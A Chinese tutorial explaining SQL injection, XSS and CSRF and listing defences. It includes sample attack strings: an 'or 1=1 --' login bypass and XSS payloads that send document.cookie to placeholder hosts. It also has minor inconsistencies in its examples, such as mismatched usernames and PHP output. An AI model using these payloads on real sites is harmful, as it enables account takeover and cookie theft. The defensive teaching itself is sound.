一. 如何避免sql注入？

1、概念

SQL 注入（SQL Injection），是 Web 开发中最常见的一种安全漏洞。
以用它来从数据库获取敏感信息、利用数据库的特性执行添加用户、导出文件等一系列恶意操作，甚至有可能获取数据库乃至系统用户最高权限。

2、造成 SQL 注入的原因

程序没有有效过滤用户的输入，使攻击者成功的向服务器提交恶意的 SQL 脚本，程序在接收后错误的将攻击者的输入作为 SQL 语句的一部分执行，导致原始的查询逻辑被改变，执行了攻击者精心构造的恶意 SQL 语句。

如 从用户表根据用户名 ConstXiong 和密码 123 查用户信息

select * from user where username = 'lamp' and password = '123'

恶意修改用户名参数 lamp -> lamp' or 1=1 --

select * from user where username = 'ConstXiong' or 1=1 --' and password = '123'

SQL 中 -- 是注释标记，如果上面这个 SQL 被执行，就可以让攻击者在不知道任何用户名和密码的情况下成功登录。

3、预防 SQL 注入攻击的方法

• 严格限制 Web 应用的数据库的操作权限，给连接数据库的用户提供满足需要的最低权限，最大限度的减少注入攻击对数据库的危害
• 校验参数的数据格式是否合法（可以使用正则或特殊字符的判断）
• 对进入数据库的特殊字符进行转义处理，或编码转换
• 预编译 SQL，参数化查询方式，避免 SQL 拼接
• 发布前，利用工具进行 SQL 注入检测
• 报错信息不要包含 SQL 信息输出到 Web 页面

二.什么是XSS攻击，如何避免？

XSS 攻击，即跨站脚本攻击（Cross Site Scripting），它是 web 程序中常见的漏洞。

1.原理

攻击者往 web 页面里插入恶意的 HTML 代码（Javascript、css、html 标签等），当用户浏览该页面时，嵌入其中的 HTML 代码会被执行，从而达到恶意攻击用户的目的。如盗取用户 cookie 执行一系列操作，破坏页面结构、重定向到其他网站等。

二.种类

1、DOM Based XSS：基于网页 DOM 结构的攻击
例如：

• input 标签 value 属性赋值

<input type="text" value="<%= getParameter("content") %>">

访问

http://xxx.xxx.xxx/search?content=<script>alert('XSS');</script>    //弹出 XSS 字样
http://xxx.xxx.xxx/search?content=<script>window.open("xxx.aaa.xxx?param="+document.cookie)</script>    //把当前页面的 cookie 发送到 xxxx.aaa.xxx 网站

• 利用 a 标签的 href 属性的赋值

<a href="escape(<%= getParameter("newUrl") %>)">跳转...</a>

访问

http://xxx.xxx.xxx?newUrl=javascript:alert('XSS')    //点击 a 标签就会弹出 XSS 字样
变换大小写
http://xxx.xxx.xxx?newUrl=JAvaScript:alert('XSS')    //点击 a 标签就会弹出 XSS 字样
加空格
http://xxx.xxx.xxx?newUrl= JavaScript :alert('XSS')    //点击 a 标签就会弹出 XSS 字样

• image 标签 src 属性，onload、onerror、onclick 事件中注入恶意代码

<img src='xxx.xxx' onerror='javascript:window.open("http://aaa.xxx?param="+document.cookie)' />

2.Stored XSS：存储式XSS漏洞

<form action="save.php">
    <input name="content" value="">
</form>

输入 <script>window.open("xxx.aaa.xxx?param="+document.cookie)</script>，提交
当别人访问到这个页面时，就会把页面的 cookie 提交到 xxx.aaa.xxx，攻击者就可以获取到 cookie

预防思路

• web 页面中可由用户输入的地方，如果对输入的数据转义、过滤处理
• 后台输出页面的时候，也需要对输出内容进行转义、过滤处理（因为攻击者可能通过其他方式把恶意脚本写入数据库）
• 前端对 html 标签属性、css 属性赋值的地方进行校验

注意：

比如php的函数htmlentities 方法可以转义 html 字符。
示例代码：

$html = '<span>这是一个测试</span>';
dp($html);  //<span>颠三倒四</span>
pt(htmlentities($html)); //&lt;span&gt;颠三倒四&lt;/span&gt

需要考虑项目中的一些要求，比如转义会加大存储。可以考虑自定义函数，部分字符转义。

三.什么是CSRF攻击，如何避免？

CSRF：Cross Site Request Forgery（跨站点请求伪造）。

CSRF 攻击者在用户已经登录目标网站之后，诱使用户访问一个攻击页面，利用目标网站对用户的信任，以用户身份在攻击页面对目标网站发起伪造用户操作的请求，达到攻击目的。

避免方法:

• CSRF 漏洞进行检测的工具，如 CSRFTester、CSRF Request Builder...
• 验证 HTTP Referer 字段
• 添加并验证 token
• 添加自定义 http 请求头
• 敏感操作添加验证码
• 使用 post 请求